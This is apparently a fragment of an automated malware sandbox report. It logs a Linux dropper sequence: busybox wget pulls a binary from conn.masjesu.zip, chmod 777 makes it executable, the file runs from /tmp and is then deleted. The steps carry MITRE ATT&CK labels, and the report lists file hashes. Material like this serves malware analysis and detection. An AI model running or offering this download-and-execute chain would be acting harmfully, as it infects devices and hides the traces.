/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- System Network Configuration Discovery
PID:1029
-
-
/bin/chmodchmod 777 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- File and Directory Permissions Modification
PID:1030
-
-
/tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA./3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Executes dropped EXE
PID:1031
-
-
/bin/rmrm 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:1032
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97